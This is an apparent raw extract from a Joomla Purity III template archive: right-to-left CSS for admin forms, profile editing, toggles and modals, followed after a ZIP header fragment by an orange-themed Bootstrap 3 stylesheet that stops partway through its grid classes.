.com_config #templates-form .tip {
  background: #f5f5f5;
  padding: 12px 12px;
}
.com_config #templates-form textarea {
  height: auto;
  width: auto;
  min-height: 100px;
  min-width: 50%;
}
.com_config #templates-form .input-append .add-on,
.com_config #templates-form .input-prepend .add-on {
  width: 35px;
}
.com_config #templates-form .input-append input,
.com_config #templates-form .input-prepend input {
  display: inline-block;
}
.com_config #templates-form .input-append .btn,
.com_config #templates-form .input-prepend .btn {
  border: 1px solid #cccccc;
}
.com_config #templates-form .t3-admin-form-legend {
  display: none;
}
.com_config #templates-form .row-fluid .span6 {
  width: 100%;
}
@media (min-width: 768px) {
  .com_config #templates-form .control-group .control-label {
    width: 250px;
  }
  .com_config #templates-form .control-group .controls {
    margin-right: 280px;
  }
}
.com_config.view-modules #options .accordion-item {
  background-color: #ffffff;
  border: 1px solid #ddd;
  border-radius: 5px;
  margin-bottom: 8px;
}
.com_config.view-modules #options .accordion-header {
  font-size: 18px;
  margin: 0;
  padding: 16px;
  line-height: 1;
}
.com_config.view-modules #options .accordion-header .accordion-button {
  background: transparent;
  border: 0;
  padding: 0;
  text-align: right;
  width: 100%;
}
.com_config.view-modules #options .accordion-body {
  border-top: 1px solid #ddd;
  padding: 24px;
}
.com_config.view-modules #options .accordion-body .nav-tabs {
  background: transparent;
}
.com_config #modules-form .input-append .add-on,
.com_config #modules-form .input-prepend .add-on {
  width: 35px;
}
.com_config #modules-form .input-append input,
.com_config #modules-form .input-prepend input {
  display: inline-block;
}
.com_config #modules-form .input-append .btn,
.com_config #modules-form .input-prepend .btn {
  border: 1px solid #cccccc;
}
.com_config #modules-form .accordion-group {
  margin-bottom: 20px;
}
.com_config #modules-form .accordion-group .accordion-heading .accordion-toggle {
  border: 1px solid #ddd;
  border-radius: 5px 5px 0 0;
  color: #428bca;
  display: block;
  padding: 10px;
  outline: none;
}
.com_config #modules-form .accordion-group .accordion-heading .accordion-toggle.collapsed {
  border-radius: 5px;
  color: #666;
}
.com_config #modules-form .accordion-group .accordion-body {
  border: 1px solid #ddd;
  border-top: 0;
  border-radius: 0 0 5px 5px;
  padding-top: 20px;
}
.com_config #modules-form .accordion-group .accordion-body .nav-tabs {
  border-bottom: 0;
}
.com_config #modules-form .radio input[type="radio"] {
  margin-right: 0;
  position: relative;
}
.com_config #modules-form .radio label {
  padding-right: 5px;
  padding-left: 20px;
}
.controls select {
  vertical-align: middle;
  width: 220px;
}
@media (min-width: 768px) {
  .edit .inputbox,
  .edit input[type="text"],
  .edit select.inputbox,
  .edit select {
    width: 250px;
  }
}
.edit textarea {
  width: 100%;
}
.edit .input-append,
.edit .input-prepend {
  display: block;
  width: auto;
}
@media (min-width: 768px) {
  .edit .input-append input[type="text"],
  .edit .input-prepend input[type="text"],
  .edit .input-append input.inputbox,
  .edit .input-prepend input.inputbox {
    display: inline-block;
    width: 210px;
  }
}
.edit .input-append .btn,
.edit .input-prepend .btn {
  border: 1px solid #cccccc;
  background-color: #ffffff;
}
.edit.item-page #jform_com_fields_checkboxs label.checkbox,
.profile-edit #jform_com_fields_checkboxs label.checkbox {
  display: inline-block;
  margin-left: 10px;
}
.edit.item-page #jform_com_fields_checkboxs input[type="checkbox"],
.profile-edit #jform_com_fields_checkboxs input[type="checkbox"] {
  margin-right: 0;
  margin-top: -2px;
  position: relative;
  vertical-align: middle;
  width: auto;
}
.edit.item-page .minicolors-input,
.profile-edit .minicolors-input {
  height: 28px;
  width: auto;
}
.edit.item-page .chzn-container .chzn-search:before,
.profile-edit .chzn-container .chzn-search:before,
.edit.item-page .chzn-container .chzn-search:after,
.profile-edit .chzn-container .chzn-search:after {
  display: table;
  content: " ";
}
.edit.item-page .chzn-container .chzn-search:after,
.profile-edit .chzn-container .chzn-search:after {
  clear: both;
}
.profile-edit #jform_com_fields_user_checkbox label.checkbox {
  display: inline-block;
  margin-left: 10px;
}
.profile-edit #jform_com_fields_user_checkbox input {
  position: relative;
  margin-right: 0;
  margin-left: 5px;
  width: auto;
}
.profile-edit .minicolors-input {
  height: 28px;
  width: auto;
}
.profile-edit #jform_com_fields_user_image_chzn .chzn-search {
  box-sizing: border-box;
}
.profile-edit #jform_com_fields_user_image_chzn ul.chzn-results {
  box-sizing: border-box;
  padding: 0;
  margin: 0;
  width: 100%;
}
.profile-edit #jform_com_fields_user_calendar {
  float: right;
}
.profile-edit .chzn-container-single,
.profile-edit .chzn-container {
  float: right;
  margin-left: 10px;
}
@media screen and (max-width: 360px) {
  .profile-edit .chzn-container-single,
  .profile-edit .chzn-container {
    width: 100% !important;
  }
}
.profile-edit .chzn-container-single .chzn-drop,
.profile-edit .chzn-container .chzn-drop {
  box-sizing: border-box !important;
}
.j40 .profile-edit .t3onoff,
.j50 .profile-edit .t3onoff {
  min-height: auto;
  border: 0;
  height: auto;
  width: auto;
}
.j40 .profile-edit .t3onoff .radio,
.j50 .profile-edit .t3onoff .radio {
  display: flex;
  align-items: center;
  min-height: auto;
  padding: 0;
}
.j40 .profile-edit .t3onoff .radio .form-check,
.j50 .profile-edit .t3onoff .radio .form-check {
  display: flex;
  align-items: center;
}
.j40 .profile-edit .t3onoff .radio .form-check input[type="radio"],
.j50 .profile-edit .t3onoff .radio .form-check input[type="radio"] {
  display: inline-block;
}
.j40 .profile-edit .t3onoff label,
.j50 .profile-edit .t3onoff label {
  padding: 0;
  margin: 0;
  position: relative;
  top: auto;
  right: auto;
  height: auto;
  text-indent: 0;
  text-transform: none;
  width: auto;
}
.j40 .profile-edit .t3onoff label.active,
.j50 .profile-edit .t3onoff label.active {
  background: transparent;
}
.j40 .profile-edit .t3onoff label::before,
.j50 .profile-edit .t3onoff label::before,
.j40 .profile-edit .t3onoff label::after,
.j50 .profile-edit .t3onoff label::after {
  display: none;
}
.profile #users-profile-core {
  width: 100%;
}
.profile .dl-horizontal dd {
  margin-bottom: 10px;
  border-bottom: 1px dashed #ddd;
  padding-bottom: 10px;
}
.profile .dl-horizontal dd img {
  max-width: 100%;
}
.edit .nav-tabs {
  margin-bottom: 20px;
}
.edit .tab-pane:before,
.edit .tab-pane:after {
  display: table;
  content: " ";
}
.edit .tab-pane:after {
  clear: both;
}
#editor-xtd-buttons,
.toggle-editor {
  margin-top: 20px;
  margin-bottom: 20px;
}
#editor-xtd-buttons .btn,
.toggle-editor .btn {
  background-color: #ffffff;
  text-shadow: 0 1px 0 #fff;
  border-color: #cccccc;
}
#editor-xtd-buttons {
  margin-left: 40px;
}
#sbox-window {
  padding: 0;
  -webkit-box-sizing: content-box;
  -moz-box-sizing: content-box;
  box-sizing: content-box;
}
.btn.jmodedit {
  padding: 0;
}
.btn.jmodedit:focus,
.btn.jmodedit:active {
  box-shadow: none;
}
.jfedit-menu + .tooltip {
  min-width: 100px;
}
.window form table {
  border: 1px solid #dddddd;
  background: #f9f9f9;
  margin-bottom: 20px;
}
.window form table td {
  padding: 8px;
}
.window form .help-block {
  font-size: 12px;
  clear: both;
  padding-top: 5px;
}
.window.view-modules .well .control-label {
  display: inline-block;
}
.window.view-modules .well .controls {
  display: inline-block;
  vertical-align: middle;
  margin-right: 10px;
}
.window.view-modules .control-group:after {
  content: "";
  clear: both;
  display: table;
}
.window.view-modules #filter-bar {
  margin-bottom: 10px;
}
.window.view-modules #filter-bar .btn-group button {
  margin-top: 0;
}
.com_config.view-modules .btn-group label {
  float: right;
  padding-right: 10px !important;
  padding-left: 10px !important;
}
.window #imageForm {
  margin: 0;
  width: auto;
}
.window #imageForm .chzn-container {
  float: right;
}
.window #imageForm #upbutton {
  border: 1px solid #cccccc;
  float: right;
  padding: 3px 12px;
  margin-right: 5px;
}
.window #imageForm .pull-right {
  margin-left: 40px;
}
.window #imageForm .well:after {
  display: table;
  content: "";
  clear: both;
}
.window #uploadForm {
  width: auto;
}
.window #uploadForm #upload-file {
  margin: 10px 0;
}
.window .manager {
  margin: 0;
  padding: 0;
}
.window .manager:before,
.window .manager:after {
  display: table;
  content: " ";
}
.window .manager:after {
  clear: both;
}
.window .manager .thumbnail {
  float: right;
  margin-left: 10px;
  margin-right: 10px;
}
.window.view-articles .filter {
  overflow: visible;
}
.window.view-articles .filter .btn-toolbar .icon-remove,
.window.view-articles .filter .btn-toolbar .icon-search {
  margin-left: 5px;
}
.window.view-articles .filters {
  float: none !important;
}
.window.view-articles .filters .chzn-container {
  display: inline-block;
}
.window.view-articles .filters .chzn-drop input {
  float: none;
}
.t3onoff {
  border: 1px solid #aaa;
  border-radius: 0;
  display: block;
  height: 30px;
  overflow: hidden;
  padding: 0;
  position: relative;
  white-space: nowrap;
  width: 90px;
  
  
  
  
  
}
.t3onoff input[type=radio] {
  display: none;
}
.t3onoff label {
  width: 90px;
  height: 30px;
  overflow: hidden;
  display: block;
  border-radius: 0;
  position: absolute;
  top: -1px;
  right: -1px;
  z-index: 1;
  text-transform: uppercase;
  background: url(../../../../../plugins/system/t3/base-bs3/imgs/blank.gif) no-repeat transparent;
  text-indent: -999em;
}
.t3onoff label:before,
.t3onoff label:after {
  display: block;
  position: absolute;
  top: 0;
  border-radius: 0;
  -webkit-transition: all 250ms;
  -o-transition: all 250ms;
  transition: all 250ms;
}
.t3onoff label:before {
  content: "ON";
  width: 100%;
  height: 100%;
  text-indent: 0;
  color: white;
  padding: 4px 18px;
  font-weight: normal;
}
.t3onoff label:after {
  content: "";
  width: 40%;
  height: 100%;
  background: #fff;
}
.t3onoff label.off:before {
  content: "OFF";
  text-align: left;
  color: #555;
}
.t3onoff label.active {
  z-index: 0;
}
.t3onoff label.off:before {
  background: #eee;
  right: 100%;
}
.t3onoff label.off.active:before {
  right: 0%;
}
.t3onoff label.on:before {
  background: #690;
  right: -100%;
}
.t3onoff label.on.active:before {
  right: -0%;
}
.t3onoff label.off:after {
  right: 60%;
}
.t3onoff label.off.active:after {
  right: 0%;
}
.t3onoff label.on:after {
  right: 0%;
}
.t3onoff label.on.active:after {
  right: 60%;
}

fieldset.radio.btn-group {
  padding: 0;
}
fieldset.radio.btn-group input {
  display: none;
}
fieldset.radio.btn-group label {
  display: inline-block;
  min-width: 54px;
  padding: 0 12px;
  border: 1px solid #aaa;
  line-height: 28px;
  background: #eee;
  color: #555;
  border-radius: 0;
  text-align: center;
  border-left-width: 0px;
  text-transform: uppercase;
}
fieldset.radio.btn-group label:last-child {
  border-left-width: 1px;
}
fieldset.radio.btn-group label.active {
  background: #690;
  border-color: #5c8b00;
  color: #fff;
}
.window.view-modules .js-stools,
.window.view-articles .js-stools,
.window.view-contacts .js-stools,
.window.view-fields .js-stools,
.window.view-items .js-stools {
  margin-bottom: 20px;
}
.window.view-modules .js-stools .btn,
.window.view-articles .js-stools .btn,
.window.view-contacts .js-stools .btn,
.window.view-fields .js-stools .btn,
.window.view-items .js-stools .btn {
  border: 1px solid #ccc;
  margin-top: 0;
}
.window.view-modules .js-stools .input-append .btn,
.window.view-articles .js-stools .input-append .btn,
.window.view-contacts .js-stools .input-append .btn,
.window.view-fields .js-stools .input-append .btn,
.window.view-items .js-stools .input-append .btn {
  border-right: 0;
}
.window.view-modules .js-stools input,
.window.view-articles .js-stools input,
.window.view-contacts .js-stools input,
.window.view-fields .js-stools input,
.window.view-items .js-stools input {
  display: inline-block;
}
.window.view-modules .js-stools-container-filters .chzn-container-single,
.window.view-articles .js-stools-container-filters .chzn-container-single,
.window.view-contacts .js-stools-container-filters .chzn-container-single,
.window.view-fields .js-stools-container-filters .chzn-container-single,
.window.view-items .js-stools-container-filters .chzn-container-single {
  width: 220px !important;
}
.window.view-modules .js-stools-container-filters .chzn-drop,
.window.view-articles .js-stools-container-filters .chzn-drop,
.window.view-contacts .js-stools-container-filters .chzn-drop,
.window.view-fields .js-stools-container-filters .chzn-drop,
.window.view-items .js-stools-container-filters .chzn-drop {
  box-sizing: border-box !important;
}
.window.view-modules table#moduleList td .label,
.window.view-articles table#moduleList td .label,
.window.view-contacts table#moduleList td .label,
.window.view-fields table#moduleList td .label,
.window.view-items table#moduleList td .label {
  background-color: #999;
  box-sizing: border-box;
  border-radius: 3px;
  display: inline-block;
  font-weight: normal;
  font-size: 100%;
  padding: 10px;
  width: 100%;
}
.window.view-modules table#moduleList td:nth-child(1),
.window.view-articles table#moduleList td:nth-child(1),
.window.view-contacts table#moduleList td:nth-child(1),
.window.view-fields table#moduleList td:nth-child(1),
.window.view-items table#moduleList td:nth-child(1) {
  vertical-align: middle;
}
.window.view-modules .icon-publish:before,
.window.view-articles .icon-publish:before,
.window.view-contacts .icon-publish:before,
.window.view-fields .icon-publish:before,
.window.view-items .icon-publish:before {
  content: "\f00c";
  font-size: 16px;
}
.icon-eye-open:before,
.icon-eye:before {
  content: "\f06e";
  font-family: "FontAwesome";
}
.icon-file-add:before {
  content: "\f0f6";
  font-family: "FontAwesome";
}
.icon-cancel:before {
  content: "\f00d";
  font-family: "FontAwesome";
}
.icon-publish:before {
  content: "\f00c";
}
.icon-unpublish:before {
  content: "\f00d";
}
.icon-featured:before {
  content: "\f005";
}
.icon-unfeatured:before {
  content: "\f005";
}
.button2-left,
.button2-left div {
  float: right;
}
.button2-right,
.button2-right div {
  float: left;
}
.button2-left {
  margin: 5px 0 0 5px;
}
.button2-right {
  margin: 5px 5px 0 0;
}
.button2-left a,
.button2-right a,
.button2-left span,
.button2-right span {
  background: #eeeeee;
  border: 1px solid #e1e1e1;
  color: #999999;
  cursor: pointer;
  display: block;
  float: right;
  padding: 2px 10px;
  border-radius: 0;
}
.button2-left span,
.button2-right span {
  color: #999999;
  cursor: default;
}
.button2-left .page a,
.button2-right .page a,
.button2-left .page span,
.button2-right .page span {
  padding: 0 6px;
}
.button2-left a:hover,
.button2-right a:hover {
  background: #e1e1e1;
  color: #444444;
  text-decoration: none;
}
.edit.item-page a.modal,
.com_config form a.modal {
  display: inline-block;
  position: inherit;
  width: auto !important;
  top: auto !important;
  overflow: hidden;
}
.edit.item-page a.modal.btn,
.com_config form a.modal.btn {
  background: #ffffff;
  text-shadow: 0 1px 0 #fff;
  border-color: #cccccc;
  overflow: hidden;
}
.controls img.calendar {
  cursor: pointer;
  margin-right: 5px;
}
.layout-pagebreak .form-horizontal .control-group .controls {
  margin-right: 0;
}
[class^="icon-"],
[class*=" icon-"] {
  font-family: FontAwesome3 !important;
}
.view-history .btn-group {
  margin-bottom: 10px;
}
.btn [class^="icon-"],
.btn [class*=" icon-"] {
  margin-left: 5px;
}
.btn span.icon-delete:before {
  content: "\f057";
  display: inline-block;
  height: 16px;
  width: 16px;
  color: #333;
}
body.modal-open .modal.hide {
  background-color: #fff;
  display: block !important;
  right: auto;
  left: auto;
  top: 0;
  bottom: auto;
  transform: translateY(50%);
  z-index: 1050;
}
body.modal-open .modal.hide .iframe {
  border: 1px solid #ddd;
}
.thumbnails-media .imgFolder span {
  line-height: 70px;
}
.j4 joomla-tab {
  margin-bottom: 20px;
}
.j40 joomla-tab-element {
  margin-bottom: 20px;
}
ul.chosen-results {
  clear: both;
}PKӜ�\��Ơl�l'purity_iii/css/rtl/orange/bootstrap.cssnu&1i�html {
  font-family: sans-serif;
  -ms-text-size-adjust: 100%;
  -webkit-text-size-adjust: 100%;
}
body {
  margin: 0;
}
article,
aside,
details,
figcaption,
figure,
footer,
header,
hgroup,
main,
menu,
nav,
section,
summary {
  display: block;
}
audio,
canvas,
progress,
video {
  display: inline-block;
  vertical-align: baseline;
}
audio:not([controls]) {
  display: none;
  height: 0;
}
[hidden],
template {
  display: none;
}
a {
  background-color: transparent;
}
a:active,
a:hover {
  outline: 0;
}
abbr[title] {
  border-bottom: none;
  text-decoration: underline;
  text-decoration: underline dotted;
}
b,
strong {
  font-weight: bold;
}
dfn {
  font-style: italic;
}
h1 {
  font-size: 2em;
  margin: 0.67em 0;
}
mark {
  background: #ff0;
  color: #000;
}
small {
  font-size: 80%;
}
sub,
sup {
  font-size: 75%;
  line-height: 0;
  position: relative;
  vertical-align: baseline;
}
sup {
  top: -0.5em;
}
sub {
  bottom: -0.25em;
}
img {
  border: 0;
}
svg:not(:root) {
  overflow: hidden;
}
figure {
  margin: 1em 40px;
}
hr {
  box-sizing: content-box;
  height: 0;
}
pre {
  overflow: auto;
}
code,
kbd,
pre,
samp {
  font-family: monospace, monospace;
  font-size: 1em;
}
button,
input,
optgroup,
select,
textarea {
  color: inherit;
  font: inherit;
  margin: 0;
}
button {
  overflow: visible;
}
button,
select {
  text-transform: none;
}
button,
html input[type="button"],
input[type="reset"],
input[type="submit"] {
  -webkit-appearance: button;
  cursor: pointer;
}
button[disabled],
html input[disabled] {
  cursor: default;
}
button::-moz-focus-inner,
input::-moz-focus-inner {
  border: 0;
  padding: 0;
}
input {
  line-height: normal;
}
input[type="checkbox"],
input[type="radio"] {
  box-sizing: border-box;
  padding: 0;
}
input[type="number"]::-webkit-inner-spin-button,
input[type="number"]::-webkit-outer-spin-button {
  height: auto;
}
input[type="search"] {
  -webkit-appearance: textfield;
  box-sizing: content-box;
}
input[type="search"]::-webkit-search-cancel-button,
input[type="search"]::-webkit-search-decoration {
  -webkit-appearance: none;
}
fieldset {
  border: 1px solid #c0c0c0;
  margin: 0 2px;
  padding: 0.35em 0.625em 0.75em;
}
legend {
  border: 0;
  padding: 0;
}
textarea {
  overflow: auto;
}
optgroup {
  font-weight: bold;
}
table {
  border-collapse: collapse;
  border-spacing: 0;
}
td,
th {
  padding: 0;
}

@media print {
  *,
  *:before,
  *:after {
    color: #000 !important;
    text-shadow: none !important;
    background: transparent !important;
    box-shadow: none !important;
  }
  a,
  a:visited {
    text-decoration: underline;
  }
  a[href]:after {
    content: " (" attr(href) ")";
  }
  abbr[title]:after {
    content: " (" attr(title) ")";
  }
  a[href^="#"]:after,
  a[href^="javascript:"]:after {
    content: "";
  }
  pre,
  blockquote {
    border: 1px solid #999;
    page-break-inside: avoid;
  }
  thead {
    display: table-header-group;
  }
  tr,
  img {
    page-break-inside: avoid;
  }
  img {
    max-width: 100% !important;
  }
  p,
  h2,
  h3 {
    orphans: 3;
    widows: 3;
  }
  h2,
  h3 {
    page-break-after: avoid;
  }
  .navbar {
    display: none;
  }
  .btn > .caret,
  .dropup > .btn > .caret {
    border-top-color: #000 !important;
  }
  .label {
    border: 1px solid #000;
  }
  .table {
    border-collapse: collapse !important;
  }
  .table td,
  .table th {
    background-color: #fff !important;
  }
  .table-bordered th,
  .table-bordered td {
    border: 1px solid #ddd !important;
  }
}

* {
  -webkit-box-sizing: border-box;
  -moz-box-sizing: border-box;
  box-sizing: border-box;
}
*:before,
*:after {
  -webkit-box-sizing: border-box;
  -moz-box-sizing: border-box;
  box-sizing: border-box;
}
html {
  font-size: 10px;
  -webkit-tap-highlight-color: rgba(0, 0, 0, 0);
}
body {
  font-family: "Helvetica Neue", Helvetica, Arial, sans-serif;
  font-size: 14px;
  line-height: 1.42857143;
  color: #444444;
  background-color: #ffffff;
}
input,
button,
select,
textarea {
  font-family: inherit;
  font-size: inherit;
  line-height: inherit;
}
a {
  color: #ff8800;
  text-decoration: none;
}
a:hover,
a:focus {
  color: #b35f00;
  text-decoration: underline;
}
a:focus {
  outline: 5px auto -webkit-focus-ring-color;
  outline-offset: -2px;
}
figure {
  margin: 0;
}
img {
  vertical-align: middle;
}
.img-responsive,
.thumbnail > img,
.thumbnail a > img,
.carousel-inner > .item > img,
.carousel-inner > .item > a > img {
  display: block;
  max-width: 100%;
  height: auto;
}
.img-rounded {
  border-radius: 0;
}
.img-thumbnail {
  padding: 4px;
  line-height: 1.42857143;
  background-color: #ffffff;
  border: 1px solid #dddddd;
  border-radius: 0;
  -webkit-transition: all 0.2s ease-in-out;
  -o-transition: all 0.2s ease-in-out;
  transition: all 0.2s ease-in-out;
  display: inline-block;
  max-width: 100%;
  height: auto;
}
.img-circle {
  border-radius: 50%;
}
hr {
  margin-top: 20px;
  margin-bottom: 20px;
  border: 0;
  border-top: 1px solid #eeeeee;
}
.sr-only {
  position: absolute;
  width: 1px;
  height: 1px;
  padding: 0;
  margin: -1px;
  overflow: hidden;
  clip: rect(0, 0, 0, 0);
  border: 0;
}
.sr-only-focusable:active,
.sr-only-focusable:focus {
  position: static;
  width: auto;
  height: auto;
  margin: 0;
  overflow: visible;
  clip: auto;
}
[role="button"] {
  cursor: pointer;
}

code,
kbd,
pre,
samp {
  font-family: Consolas, Monaco, "Courier New", monospace;
}
code {
  padding: 2px 4px;
  font-size: 90%;
  color: #c7254e;
  background-color: #f9f2f4;
  border-radius: 0;
}
kbd {
  padding: 2px 4px;
  font-size: 90%;
  color: #ffffff;
  background-color: #333333;
  border-radius: 0;
  box-shadow: inset 0 -1px 0 rgba(0, 0, 0, 0.25);
}
kbd kbd {
  padding: 0;
  font-size: 100%;
  font-weight: 700;
  box-shadow: none;
}
pre {
  display: block;
  padding: 9.5px;
  margin: 0 0 10px;
  font-size: 13px;
  line-height: 1.42857143;
  color: #444444;
  word-break: break-all;
  word-wrap: break-word;
  background-color: #f5f5f5;
  border: 1px solid #cccccc;
  border-radius: 0;
}
pre code {
  padding: 0;
  font-size: inherit;
  color: inherit;
  white-space: pre-wrap;
  background-color: transparent;
  border-radius: 0;
}
.pre-scrollable {
  max-height: 340px;
  overflow-y: scroll;
}
.container {
  padding-left: 20px;
  padding-right: 20px;
  margin-left: auto;
  margin-right: auto;
}
@media (min-width: 768px) {
  .container {
    width: 760px;
  }
}
@media (min-width: 992px) {
  .container {
    width: 980px;
  }
}
@media (min-width: 1200px) {
  .container {
    width: 1180px;
  }
}
.container-fluid {
  padding-left: 20px;
  padding-right: 20px;
  margin-left: auto;
  margin-right: auto;
}
.row {
  margin-left: -20px;
  margin-right: -20px;
}
.row-no-gutters {
  margin-left: 0;
  margin-right: 0;
}
.row-no-gutters [class*="col-"] {
  padding-left: 0;
  padding-right: 0;
}
.col-xs-1, .col-sm-1, .col-md-1, .col-lg-1, .col-xs-2, .col-sm-2, .col-md-2, .col-lg-2, .col-xs-3, .col-sm-3, .col-md-3, .col-lg-3, .col-xs-4, .col-sm-4, .col-md-4, .col-lg-4, .col-xs-5, .col-sm-5, .col-md-5, .col-lg-5, .col-xs-6, .col-sm-6, .col-md-6, .col-lg-6, .col-xs-7, .col-sm-7, .col-md-7, .col-lg-7, .col-xs-8, .col-sm-8, .col-md-8, .col-lg-8, .col-xs-9, .col-sm-9, .col-md-9, .col-lg-9, .col-xs-10, .col-sm-10, .col-md-10, .col-lg-10, .col-xs-11, .col-sm-11, .col-md-11, .col-lg-11, .col-xs-12, .col-sm-12, .col-md-12, .col-lg-12 {
  position: relative;
  min-height: 1px;
  padding-left: 20px;
  padding-right: 20px;
}
.col-xs-1, .col-xs-2, .col-xs-3, .col-xs-4, .col-xs-5, .col-xs-6, .col-xs-7, .col-xs-8, .col-xs-9, .col-xs-10, .col-xs-11, .col-xs-12 {
  float: right;
}
.col-xs-12 {
  width: 100%;
}
.col-xs-11 {
  width: 91.66666667%;
}
.col-xs-10 {
  width: 83.33333333%;
}
.col-xs-9 {
  width: 75%;
}
.col-xs-8 {
  width: 66.66666667%;
}
.col-xs-7 {
  width: 58.33333333%;
}
.col-xs-6 {
  width: 50%;
}
.col-xs-5 {
  width: 41.66666667%;
}
.col-xs-4 {
  width: 33.33333333%;
}
.col-xs-3 {
  width: 25%;
}
.col-xs-2 {
  width: 16.66666667%;
}
.col-xs-1 {
  width: 8.33333333%;
}
.col-xs-pull-12 {
  left: 100%;
}
.col-xs-pull-11 {
  left: 91.66666667%;
}
.col-xs-pull-10 {
  left: 83.33333333%;
}
.col-xs-pull-9 {
  left: 75%;
}
.col-xs-pull-8 {
  left: 66.66666667%;
}
.col-xs-pull-7 {
  left: 58.33333333%;
}
.col-xs-pull-6 {
  left: 50%;
}
.col-xs-pull-5 {
  left: 41.66666667%;
}
.col-xs-pull-4 {
  left: 33.33333333%;
}
.col-xs-pull-3 {
  left: 25%;
}
.col-xs-pull-2 {
  left: 16.66666667%;
}
.col-xs-pull-1 {
  left: 8.33333333%;
}
.col-xs-pull-0 {
  left: auto;
}
.col-xs-push-12 {
  right: 100%;
}
.col-xs-push-11 {
  right: 91.66666667%;
}
.col-xs-push-10 {
  right: 83.33333333%;
}
.col-xs-push-9 {
  right: 75%;
}
.col-xs-push-8 {
  right: 66.66666667%;
}
.col-xs-push-7 {
  right: 58.33333333%;
}
.col-xs-push-6 {
  right: 50%;
}
.col-xs-push-5 {
  right: 41.66666667%;
}
.col-xs-push-4 {
  right: 33.33333333%;
}
.col-xs-push-3 {
  right: 25%;
}
.col-xs-push-2 {
  right: 16.66666667%;
}
.col-xs-push-1 {
  right: 8.33333333%;
}
.col-xs-push-0 {
  right: auto;
}
.col-xs-offset-12 {
  margin-right: 100%;
}
.col-xs-offset-11 {
  margin-right: 91.66666667%;
}
.col-xs-offset-10 {
  margin-right: 83.33333333%;
}
.col-xs-offset-9 {
  margin-right: 75%;
}
.col-xs-offset-8 {
  margin-right: 66.66666667%;
}
.col-xs-offset-7 {
  margin-right: 58.33333333%;
}
.col-xs-offset-6 {
  margin-right: 50%;
}
.col-xs-offset-5 {
  margin-right: 41.66666667%;
}
.col-xs-offset-4 {
  margin-right: 33.33333333%;
}
.col-xs-offset-3 {
  margin-right: 25%;
}
.col-xs-offset-2 {
  margin-right: 16.66666667%;
}
.col-xs-offset-1 {
  margin-right: 8.33333333%;
}
.col-xs-offset-0 {
  margin-right: 0%;
}
@media (min-width: 768px) {
  .col-sm-1, .col-sm-2, .col-sm-3, .col-sm-4, .col-sm-5, .col-sm-6, .col-sm-7, .col-sm-8, .col-sm-9, .col-sm-10, .col-sm-11, .col-sm-12 {
    float: right;
  }
  .col-sm-12 {
    width: 100%;
  }
  .col-sm-11 {
    width: 91.66666667%;
  }
  .col-sm-10 {
    width: 83.33333333%;
  }
  .col-sm-9 {
    width: 75%;
  }
  .col-sm-8 {
    width: 66.66666667%;
  }
  .col-sm-7 {
    width: 58.33333333%;
  }
  .col-sm-6 {
    width: 50%;
  }
  .col-sm-5 {
    width: 41.66666667%;
  }
  .col-sm-4 {
    width: 33.33333333%;
  }
  .col-sm-3 {
    width: 25%;
  }
  .col-sm-2 {
    width: 16.66666667%;
  }
  .col-sm-1 {
    width: 8.33333333%;
  }
  .col-sm-pull-12 {
    left: 100%;
  }
  .col-sm-pull-11 {
    left: 91.66666667%;
  }
  .col-sm-pull-10 {
    left: 83.33333333%;
  }
  .col-sm-pull-9 {
    left: 75%;
  }
  .col-sm-pull-8 {
    left: 66.66666667%;
  }
  .col-sm-pull-7 {
    left: 58.33333333%;
  }
  .col-sm-pull-6 {
    left: 50%;
  }
  .col-sm-pull-5 {
    left: 41.66666667%;
  }
  .col-sm-pull-4 {
    left: 33.33333333%;
  }
  .col-sm-pull-3 {
    left: 25%;
  }
  .col-sm-pull-2 {
    left: 16.66666667%;
  }
  .col-sm-pull-1 {
    left: 8.33333333%;
  }
  .col-sm-pull-0 {
    left: auto;
  }
  .col-sm-push-12 {
    right: 100%;
  }
  .col-sm-push-11 {
    right: 91.66666667%;
  }
  .col-sm-push-10 {
    right: 83.33333333%;
  }
  .col-sm-push-9 {
    right: 75%;
  }
  .col-sm-push-8 {
    right: 66.66666667%;
  }
  .col-sm-push-7 {
    right: 58.33333333%;
  }
  .col-sm-push-6 {
    right: 50%;
  }
  .col-sm-push-5 {
    right: 41.66666667%;
  }
  .col-sm-push-4 {
    right: 33.33333333%;
  }
  .col-sm-push-3 {
    right: 25%;
  }
  .col-sm-push-2 {
    right: 16.66666667%;
  }
  .col-sm-push-1 {
    right: 8.33333333%;
  }
  .col-sm-push-0 {
    right: auto;
  }
  .col-sm-offset-12 {
    margin-right: 100%;
  }
  .col-sm-offset-11 {
    margin-right: 91.66666667%;
  }
  .col-sm-offset-10 {
    margin-right: 83.33333333%;
  }
  .col-sm-offset-9 {
    margin-right: 75%;
  }
  .col-sm-offset-8 {
    margin-right: 66.66666667%;
  }
  .col-sm-offset-7 {
    margin-right: 58.33333333%;
  }
  .col-sm-offset-6 {
    margin-right: 50%;
  }
  .col-sm-offset-5 {
    margin-right: 41.66666667%;
  }
  .col-sm-offset-4 {
    margin-right: 33.33333333%;
  }
  .col-sm-offset-3 {
    margin-right: 25%;
  }
  .col-sm-offset-2 {
    margin-right: 16.66666667%;
  }
  .col-sm-offset-1 {
    margin-right: 8.33333333%;
  }
  .col-sm-offset-0 {
    margin-right: 0%;
  }
}
@media (min-width: 992px) {
  .col-md-1, .col-md-2, .col-md-3, .col-md-4, .col-md-5, .col-md-6, .col-md-7, .col-md-8, .col-md-9, .col-md-10, .col-md-11, .col-md-12 {
    float: right;
  }
  .col-md-12 {
    width: 100%;
  }
  .col-md-11 {
    width: 91.66666667%;
  }
  .col-md-10 {
    width: 83.33333333%;
  }
  .col-md-9 {
    width: 75%;
  }
  .col-md-8 {
    width: 66.66666667%;
  }
  .col-md-7 {
    width: 58.33333333%;
  }
  .col-md-6 {
    width: 50%;
  }
  .col-md-5 {
    width: 41.66666667%;
  }
  .col-md-4 {
    width: 33.33333333%;
  }
  .col-md-3 {
    width: 25%;
  }
  .col-md-2 {
    width: 16.66666667%;
  }
  .col-md-1 {
    width: 8.33333333%;
  }
  .col-md-pull-12 {
    left: 100%;
  }
  .col-md-pull-11 {
    left: 91.66666667%;
  }
  .col-md-pull-10 {
    left: 83.33333333%;
  }
  .col-md-pull-9 {
    left: 75%;
  }
  .col-md-pull-8 {
    left: 66.66666667%;
  }
  .col-md-pull-7 {
    left: 58.33333333%;
  }
  .col-md-pull-6 {
    left: 50%;
  }
  .col-md-pull-5 {
    left: 41.66666667%;
  }
  .col-md-pull-4 {
    left: 33.33333333%;
  }
  .col-md-pull-3 {
    left: 25%;
  }
  .col-md-pull-2 {
    left: 16.66666667%;
  }
  .col-md-pull-1 {
    left: 8.33333333%;
  }
